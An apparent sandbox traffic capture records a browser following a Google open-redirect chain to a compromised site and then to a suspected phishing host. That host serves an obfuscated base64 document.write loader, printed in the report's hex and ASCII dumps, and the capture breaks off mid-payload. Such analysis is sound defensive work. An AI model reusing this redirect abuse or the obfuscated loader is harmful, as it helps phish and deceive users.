                                                                                                                                          Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 b2 69 57 db 5c d6 26 fc bd d7 7a fe 03 a9 ea be 65 c5 0e e8 4c 1a e2 72 d5 22 40 80 10 86 30 85 e1 61 d5 3a 3a 03 56 30 96 91 65 86 d0 fc f7 3e 7b cb d8 92 6f a8 aa ee f7 c3 4b 56 8e 64 ed 7d f6 be a6 ff fa 1f ff e5 fe fd ed c3 fa fe da f1 f9 c1 c6 52 bf bc 1d fc dd 7d 98 3d 8d d4 ee b9 e4 fe aa f3 6f b7 a6 94 4b 43 79 6b 7a 7f d1 66 ac 8a 6c 54 66 f9 f0 2f 4b 2a 1f 96 66 58 f6 fe b2 3a 1a 0d cc 78 49 16 66 29 1f ba ff 76 a9 ec 9b a5 db 7c 5c 2e 8d f2 d1 64 20 8b 25 5b 4c b2 72 bc 94 0d b1 f4 90 17 03 dd 59 92 43 bd 64 f3 62 e9 3a cf f5 52 61 e4 38 1f 2e 2f 1d f7 cd 13 8e d2 66 90 a9 2c 9f 8c 3b 4b c3 49 59 64 65 f5 0e 97 ee 4d 31 96 65 36 30 d0 9e c1 e6 32 53 03 37 37 1b 0c 96 46 45 7e 9f 69 b3 f4 94 4f dc 87 b2 bf 64 5c fb 53 d9 cf 86 d7 f8 6d 68 8c 5e 2a f3 a5 9b 61 fe b0 24 d3 7c 52 2e 49 24 d0 71 f0 d4 60 a2 a1 d1 a1 cc 8a 25 37 bb cc 8b a7 ce 52 f9 34 82 ba d3 66 e0 06 a6 66 68 ac a3 53 81 e9 bb 31 6e 9c 91 25 dc ba 5d fe cb d2 0a e8 b8 32 15 [TRUNCATED]
                                                                                                                                          Data Ascii: 1faaiW\&zeLr"@0a::V0e>{oKVd}R}=oKCykzflTf/K*fX:xIf)v|\.d %[LrYCdb:Ra8./f,;KIYdeM1e602S77FE~iOd\Smh^*a$|R.I$q`%7R4ffhS1n%]2oiMgKe|x4ON+]?/.p=&Lw+9tfqBmH%udpyv/O7,FAP7zUoUaB&4K'fjX5]iQKsc,(cV2525OAcGW@0,`iuC8x.'@O0/k3IxXN`*\OTI*.<[[nGQ](dQD;[9|B&fYzLxidq%p@g]6g4]:Sr3l&Yi@6T61C0A>~d?tA2o+{6oNWNi+'UdBVf7IYdkLjP0K.]^B0Sif):KY)o]\Rvy"*|IR,{;KLnFQvX/ac3C7rPUK&SA6qq8pr~sfglx
                                                                                                                                          Nov 18, 2024 06:47:22.237163067 CET1236INData Raw: 9f e7 6e a2 dc 5c 67 fc cd 74 60 51 be 52 7e 27 2a 8b 77 c6 65 91 df fc a7 cd 4e 71 65 8a 77 9a b7 6f 9d 09 f7 ae fb c1 64 d7 fd 72 69 90 8f df 4b f9 ac 35 1d 60 42 26 d7 b2 40 ab 8b 7c f0 ff 9c e0 c2 a8 6c 64 c6 8b ce 1d 56 9f df f2 69 cb 40 4a
                                                                                                                                          Data Ascii: n\gt`QR~'*weNqewodriK5`B&@|ldVi@J1<,M,}Y@AF{zVu.zJRu<EMfd2,zCto,3\^:'RjffhR^,~e2vQn#t/OX
                                                                                                                                          Nov 18, 2024 06:47:22.237200975 CET1236INData Raw: 93 f7 7b e0 4c b1 8a d2 6f 5f 6b 54 81 25 94 30 36 7e da de 49 bf 02 82 32 2f cc ca 3f cc 2d b8 99 66 43 48 25 a5 c3 54 df fe 80 d7 bd c7 87 e2 04 82 63 f7 7e 01 8b a7 dd fb df 6b 90 c9 af d9 fe 16 4c df cf ce 60 cb c4 fe be 86 80 0d e4 bd 71 56
                                                                                                                                          Data Ascii: {Lo_kT%06~I2/?-fCH%Tc~kL`qV,CA= eG l'pkldp0fz _0~:,=bwaw|Y=*Ermi~0<&m>}ub>Dwv?@h~
                                                                                                                                          Nov 18, 2024 06:47:22.237734079 CET1236INData Raw: 5f 87 a7 7b 6e cc fe 31 64 ed 7e a5 cc 86 cb fd f2 f6 af 18 62 96 b0 e0 48 de 6f 1c af c3 b4 ad 75 78 ec ae 1e ee bb c7 f1 8e cc 01 d4 a7 07 d9 cf f4 27 33 04 7a 6b fb bb 00 67 b9 cc 0a e3 80 4e 46 f0 ad 38 bd 83 3d bb b7 c3 af c0 72 6b ef fe e2
                                                                                                                                          Data Ascii: _{n1d~bHoux'3zkgNF8=rk'v}p.IffJ.g.q`sBmnA&Ww[inMV/0l~ u`6>=MON4+-\y)\0&$<?zX+;Wr
                                                                                                                                          Nov 18, 2024 06:47:22.237770081 CET848INData Raw: e1 0b 15 c8 21 82 e1 f0 62 c2 08 16 90 8f 00 2e f5 ff f8 a3 f5 86 5d 97 5e 61 46 03 a9 4c 83 85 e7 f9 7e 67 6e f3 cb 2c 5b 6a 60 e4 70 e3 56 66 03 e8 66 41 1a a4 d4 7f ae 47 8f f0 34 b1 29 54 95 0d a4 4a 30 70 42 51 23 30 47 2a 32 1c df a8 09 4d
                                                                                                                                          Data Ascii: !b.]^aFL~gn,[j`pVffAG4)TJ0pBQ#0G*2Mv4h,Rcy;r1 6h9"8S7oqP19< skj;pFp:o{7^t~AREV[=,hNezI:.f$v4D@{9iE74 Ini7xh&tA
                                                                                                                                          Nov 18, 2024 06:47:22.237804890 CET1236INData Raw: 56 d0 d0 85 26 46 40 2c 70 db 8e 36 9f be ee 2f 6c 33 51 18 59 d8 26 58 42 45 43 a2 aa d6 9e d5 60 d9 89 b5 df 8e bd cf 5e bf 2c 47 e3 cf 2b 2b da 78 0b 62 b0 18 a5 12 28 1b 32 d5 a9 df f6 f2 db 65 39 59 19 4d c6 fd 85 0b 89 74 20 69 ec 0e 89 79
                                                                                                                                          Data Ascii: V&F@,p6/l3QY&XBEC`^,G++xb(2e9YMt iy6Y@Zk^R~7gs(FZk^;_7E,g0a}FUkk#;=xXI0+$@Yt1Z+%5!b#ZJ8GX=reUJNC^6yb# "q82k
                                                                                                                                          Nov 18, 2024 06:47:22.238571882 CET1236INData Raw: 5a 7b 56 73 a4 bd bd c7 87 e2 c4 fb ec ad 6f 1c ae 7a 1d ef c7 41 ff e9 b8 39 91 b1 34 60 48 83 1a 1a 47 b2 3e b1 aa b5 67 35 98 78 f0 7b eb 61 d3 4d ec 97 e5 68 fc 79 65 65 14 79 ed b9 2e 10 cd d8 65 95 46 01 9c 4c 41 6e 35 f7 71 46 9c c6 2e ce
                                                                                                                                          Data Ascii: Z{VsozA94`HG>g5x{aMhyeey.eFLAn5qF.('3;~Cx&BD gU:UX)B,TiwXP$fJXP7LjycJW;_#fi[<N8o?Ig6-*fk*(D'U{ aL
                                                                                                                                          Nov 18, 2024 06:47:22.238606930 CET1236INData Raw: 74 ef d9 fb f2 70 f6 7d cd fb fc da 8f ca 04 d2 19 0b 8b 43 ce 58 5d 83 aa d2 7a ad 74 5f 3a 9e 3c b8 7f fa e5 7d 06 3c 22 e2 12 28 1a e0 16 00 b3 c4 1d da f8 1d ef f4 70 ac d6 b1 4b 88 20 a1 d6 75 71 02 2d 4c 71 68 14 28 87 0c 5c eb 24 1d 1f 2c
                                                                                                                                          Data Ascii: tp}CX]zt_:<}<"(pK uq-Lqh(\$,b\"mZTz&O71fa0xvm9kM_^C0tXqK#Ne)u$UE<ICWg5vu:Z<mcj>^:Xo\%
                                                                                                                                          Nov 18, 2024 06:47:22.238641977 CET1236INData Raw: a8 8c 89 54 75 2d aa 5a 7b 56 43 2d f6 76 4f 8f 9a a2 93 00 14 47 1e 31 43 8c d4 ed 1a ef 1d f4 0f 9a bb 48 42 04 47 d7 99 b4 26 0c ea bb aa 5a 6b 5e c3 65 fb 7b db db cd 19 56 45 26 91 38 23 21 94 b1 fa 8c aa d6 9a d7 60 c6 ef e1 d3 af e1 02 8e
                                                                                                                                          Data Ascii: Tu-Z{VC-vOG1CHBG&Zk^e{VE&8#!`h+3R%Xkj0bYxk!U5"8M9`~[H2UNRd518/6r!65uBU"UaZsULTyDRk^jQr<-q
                                                                                                                                          Nov 18, 2024 06:47:22.239358902 CET1236INData Raw: 80 f9 fc e9 cb 6f bb 10 82 30 02 10 12 d1 32 3c c3 d8 ad fb 79 7c b4 b5 90 78 1a f0 24 66 95 a9 51 c8 1b 86 54 b5 f6 ac 06 db b6 1f af cf 46 b8 6d ca cd 91 82 05 06 42 cf e0 d0 51 9d 3a a8 0b 74 13 e4 1f 71 c0 12 34 1b 22 c8 1e 81 ab 0a 60 4b ea
                                                                                                                                          Data Ascii: o02<y|x$fQTFmBQ:tq4"`Kx[{?ml/,!lPkj?}~6((rDa(:R6OH<BF-hI$H]G&-E$i@uVUkk`!W!_SU(TE3*B=
                                                                                                                                          Nov 18, 2024 06:47:22.239394903 CET1236INData Raw: e9 9c 77 22 a5 1a 75 4b de 12 4c d8 18 05 43 af 43 dc 9d b0 85 dc 59 8c 9c 42 c1 39 46 53 3b 44 e3 d1 d9 fd 9f c0 0b cc 18 60 e1 6e 1f 24 8d ba d6 93 b5 ef 37 df 9a 5a 39 35 64 a2 41 2b 91 1a c3 6d 5d ab aa d6 9e d5 40 aa 1f bf 7e 6c 3f e1 b6 19
                                                                                                                                          Data Ascii: w"uKLCCYB9FS;D`n$7Z95dA+m]@~l?aq-Aa,(*]Yfk{+.j.b0)XkkA<%3|hSJgjrs>j(u!ikYm<6Gp&EE)#Zk^B* D3-xz}e9^YQc
                                                                                                                                          Nov 18, 2024 06:47:22.464626074 CET1236INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:22 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                          Connection: Upgrade, Keep-Alive
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          Keep-Alive: timeout=5, max=75
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 b2 69 57 db 5c d6 26 fc bd d7 7a fe 03 a9 ea be 65 c5 0e e8 4c 1a e2 72 d5 22 40 80 10 86 30 85 e1 61 d5 3a 3a 03 56 30 96 91 65 86 d0 fc f7 3e 7b cb d8 92 6f a8 aa ee f7 c3 4b 56 8e 64 ed 7d f6 be a6 ff fa 1f ff e5 fe fd ed c3 fa fe da f1 f9 c1 c6 52 bf bc 1d fc dd 7d 98 3d 8d d4 ee b9 e4 fe aa f3 6f b7 a6 94 4b 43 79 6b 7a 7f d1 66 ac 8a 6c 54 66 f9 f0 2f 4b 2a 1f 96 66 58 f6 fe b2 3a 1a 0d cc 78 49 16 66 29 1f ba ff 76 a9 ec 9b a5 db 7c 5c 2e 8d f2 d1 64 20 8b 25 5b 4c b2 72 bc 94 0d b1 f4 90 17 03 dd 59 92 43 bd 64 f3 62 e9 3a cf f5 52 61 e4 38 1f 2e 2f 1d f7 cd 13 8e d2 66 90 a9 2c 9f 8c 3b 4b c3 49 59 64 65 f5 0e 97 ee 4d 31 96 65 36 30 d0 9e c1 e6 32 53 03 37 37 1b 0c 96 46 45 7e 9f 69 b3 f4 94 4f dc 87 b2 bf 64 5c fb 53 d9 cf 86 d7 f8 6d 68 8c 5e 2a f3 a5 9b 61 fe b0 24 d3 7c 52 2e 49 24 d0 71 f0 d4 60 a2 a1 d1 a1 cc 8a 25 37 bb cc 8b a7 ce 52 f9 34 82 ba d3 66 e0 06 a6 66 68 ac a3 53 81 e9 bb 31 6e 9c 91 25 dc ba 5d fe cb d2 0a e8 b8 32 15 [TRUNCATED]
                                                                                                                                          Data Ascii: 1faaiW\&zeLr"@0a::V0e>{oKVd}R}=oKCykzflTf/K*fX:xIf)v|\.d %[LrYCdb:Ra8./f,;KIYdeM1e602S77FE~iOd\Smh^*a$|R.I$q`%7R4ffhS1n%]2oiMgKe|x4ON+]?/.p=&Lw+9tfqBmH%udpyv/O7,FAP7zUoUaB&4K'fjX5]iQKsc,(cV2525OAcGW@0,`iuC8x.'@O0/k3IxXN`*\OTI*.<[[nGQ](dQD;[9|B&fYzLxidq%p@g]6g4]:Sr3l&Yi@6T61C0A>~d?tA2o+{6oNWNi+'UdBVf7IYdkLjP0K.]^B0Sif):KY)o]\Rvy"*|IR,{;KLnFQvX/ac3C7rPUK&SA6qq8pr~sfglx


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.1649705142.250.186.1314436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:19 UTC937OUTGET /url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F HTTP/1.1
                                                                                                                                          Host: www.google.ki
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:19 UTC1007INHTTP/1.1 302 Found
                                                                                                                                          Location: https://www.google.ki/amp/plimmerton.org.nz/jugz/
                                                                                                                                          Cache-Control: private
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-1DuvRn96mGnFj4ogFlgSVg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:19 GMT
                                                                                                                                          Server: gws
                                                                                                                                          Content-Length: 246
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          Set-Cookie: NID=519=sQjifQE7owb0s5b-aGwU8s_OkAMsqqo_hZa2uXgG60dATIdNhcNaMEhF20iVM16Xi6GHBZmCKO5LQJqQRHVo8oARJtrG2JbPfSplJ8RvOaR3pust3CXD8cI-lbj_HmIDwrNDsKWGjT0H_HNaJloUX16tY2My0gEJbChlc1QW6yKLDDMYKNNWs9WfdupvQPfhEo6J; expires=Tue, 20-May-2025 05:47:19 GMT; path=/; domain=.google.ki; Secure; HttpOnly; SameSite=none
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:19 UTC246INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 6b 69 2f 61 6d 70 2f 70 6c 69 6d 6d 65 72 74 6f 6e 2e 6f 72 67 2e 6e 7a 2f 6a 75 67 7a 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.ki/amp/plimmerton.org.nz/jugz/">here</A>.</BODY></HTML>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.1649704142.250.186.1314436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:20 UTC1054OUTGET /amp/plimmerton.org.nz/jugz/ HTTP/1.1
                                                                                                                                          Host: www.google.ki
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: NID=519=sQjifQE7owb0s5b-aGwU8s_OkAMsqqo_hZa2uXgG60dATIdNhcNaMEhF20iVM16Xi6GHBZmCKO5LQJqQRHVo8oARJtrG2JbPfSplJ8RvOaR3pust3CXD8cI-lbj_HmIDwrNDsKWGjT0H_HNaJloUX16tY2My0gEJbChlc1QW6yKLDDMYKNNWs9WfdupvQPfhEo6J
                                                                                                                                          2024-11-18 05:47:20 UTC799INHTTP/1.1 302 Found
                                                                                                                                          Location: http://plimmerton.org.nz/jugz/
                                                                                                                                          Cache-Control: private
                                                                                                                                          X-Robots-Tag: noindex
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-j1jZi-7mViyoBfgLzOYW1A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:20 GMT
                                                                                                                                          Server: gws
                                                                                                                                          Content-Length: 227
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:20 UTC227INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 70 6c 69 6d 6d 65 72 74 6f 6e 2e 6f 72 67 2e 6e 7a 2f 6a 75 67 7a 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://plimmerton.org.nz/jugz/">here</A>.</BODY></HTML>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.1649709188.114.96.34436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:23 UTC696OUTGET /3XdZQxT/ HTTP/1.1
                                                                                                                                          Host: supernova.hethantac.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                          Referer: http://plimmerton.org.nz/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:23 UTC1221INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:23 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: no-cache, private
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PA9oc0Od%2FcfqO9iUjvX0%2Bf8MXIqDClGnD7C4l4iu20rIKJr51%2FbAiXHTFfrte3oBdWt%2BKXainp3Em3ITiuthA4NZ4mYz57Rys8EWiKEea4QuG0RsI33KE3B56%2BF0Gg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=214&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1604&delivery_rate=14126829&cwnd=252&unsent_bytes=0&cid=5a86f996dcd7b2d3&ts=134&x=0"
                                                                                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6InRDVEZMSUZOSzE0SEtNOURweW9vSXc9PSIsInZhbHVlIjoiaUVNTlpLbVRzNXFtdnk5UU5KbmhwaGhlVVR2VTI0OEF1V2NoTyt6YmlVajhFZzlkSVlKOHEzUTNic1BtWnJHWk9zdlJyME92bm5wMUsyM3BZMmtlMnJLcVgyQUc2OUZZN1plSm1WdkRpdjRkREdXVkVnZ0lKNFFSREFJeU5wd0kiLCJtYWMiOiJkODdjYWQxZTA3YmE5Mjk2YzU4ZDEwOTViZTdkZmFiNDRjMTMyMWFmYWZkZWFjOTRlMzRmNWMxNWQ2MGRiZGY3IiwidGFnIjoiIn0%3D; expires=Mon, 18-Nov-2024 07:47:23 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                          2024-11-18 05:47:23 UTC707INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 70 48 4e 7a 56 49 55 7a 55 72 53 46 4e 72 59 57 4e 4a 54 48 70 71 61 55 4a 55 5a 47 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 5a 6a 64 4c 51 33 70 43 4f 54 67 7a 64 33 4a 30 53 45 35 6e 52 57 59 79 62 31 52 30 4b 7a 49 33 63 6d 31 6e 63 7a 64 6e 61 45 68 47 57 6e 42 59 63 56 70 47 63 45 45 77 64 48 46 6e 59 53 39 6c 63 55 6c 61 55 6e 4a 73 65 6a 64 44 57 6d 68 74 62 30 5a 43 53 44 52 69 4e 32 56 6a 62 6e 42 78 61 57 4a 73 63 44 5a 74 4f 45 78 50 4f 54 4a 42 4f 58 5a 45 4d 58 4e 71 4f 57 64 79 54 32 70 50 62 6e 42 68 55 45 31 6c 59 6d 4d 30 4d 54 4d 34 59 32 51 78 55 30 38 30 51 31 42 71 62 6e 5a 36 5a 32 39 77 53 32 51 33 51 33 59
                                                                                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImpHNzVIUzUrSFNrYWNJTHpqaUJUZGc9PSIsInZhbHVlIjoiZjdLQ3pCOTgzd3J0SE5nRWYyb1R0KzI3cm1nczdnaEhGWnBYcVpGcEEwdHFnYS9lcUlaUnJsejdDWmhtb0ZCSDRiN2VjbnBxaWJscDZtOExPOTJBOXZEMXNqOWdyT2pPbnBhUE1lYmM0MTM4Y2QxU080Q1BqbnZ6Z29wS2Q3Q3Y
                                                                                                                                          2024-11-18 05:47:23 UTC1369INData Raw: 34 66 63 33 0d 0a 3c 21 2d 2d 20 54 68 65 20 73 75 63 63 65 73 73 66 75 6c 20 77 61 72 72 69 6f 72 20 69 73 20 74 68 65 20 61 76 65 72 61 67 65 20 6d 61 6e 2c 20 77 69 74 68 20 6c 61 73 65 72 2d 6c 69 6b 65 20 66 6f 63 75 73 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 42 63 6c 6c 34 4c 6d 68 6c 64 47 68 68 62 6e 52 68 59 79 35 6a 62 32 30 76 4d 31 68 6b 57 6c 46 34 56 43 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53
                                                                                                                                          Data Ascii: 4fc3... The successful warrior is the average man, with laser-like focus. --><script>if(atob("aHR0cHM6Ly9Bcll4LmhldGhhbnRhYy5jb20vM1hkWlF4VC8=") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPS
                                                                                                                                          2024-11-18 05:47:23 UTC1369INData Raw: 66 51 30 4b 49 32 46 5a 52 6d 6c 72 59 6b 70 4e 59 32 45 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 45 33 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a
